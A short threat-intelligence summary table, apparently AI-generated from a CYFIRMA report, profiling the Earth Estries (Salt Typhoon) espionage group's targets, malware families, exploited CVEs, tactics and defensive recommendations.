| Category | Details |
|---|---|
| Threat Actors | – Earth Estries – Aliases: Famous Sparrow, Ghost Emperor, Salt Typhoon, UNC2286 |
| Campaign Overview | – Advanced cyber espionage campaigns – Targeting critical infrastructure, government entities, and key industries globally |
| Target Regions | – United States – Germany – South Africa – Malaysia – Philippines – Taiwan – India – Canada – Singapore |
| Methodology | – Dual attack chains (via CAB files or cURL downloads) – Exploiting vulnerabilities in systems like Microsoft Exchange Server – Keylogging, DLL sideloading – Memory-resident malware operations |
| Products Targeted | – Microsoft Exchange Server – Ivanti Connect Secure – Fortinet FortiClient EMS – Sophos Firewall – IoT devices – Virtual Private Servers (VPS) – Windows systems |
| Malware Reference | – HemiGate – GhostSpider – Zingdoor – Cobalt Strike – MASOL RAT – SNAPPYBEE – Demodex rootkit |
| Tools Used | – PsExec – Trillclient – Hemigate – Crowdoor – CAB files – cURL – Encrypted communications – Anonymized file-sharing services |
| Vulnerabilities Exploited | – CVE-2023-46805 – CVE-2024-21887 – CVE-2023-48788 – Exploits in Microsoft Exchange Server, Ivanti, Fortinet, and Sophos products |
| TTPs | – Data exfiltration via anonymized services – Prolonged persistence with modular malware – Encryption for stealth – In-memory operation to evade detection – Exploiting N-day vulnerabilities |
| Attribution | – Earth Estries – Suspected to be a Chinese APT group |
| Recommendations | – Patch systems to address exploited vulnerabilities – Monitor for persistence and lateral movement – Implement advanced threat detection – Enhance defenses against in-memory malware and encrypted C&C |
| Source | – CYFIRMA |
Read full article: https://www.cyfirma.com/research/apt-profile-earth-estries/
The above summary has been generated by an AI language model
Leave a Reply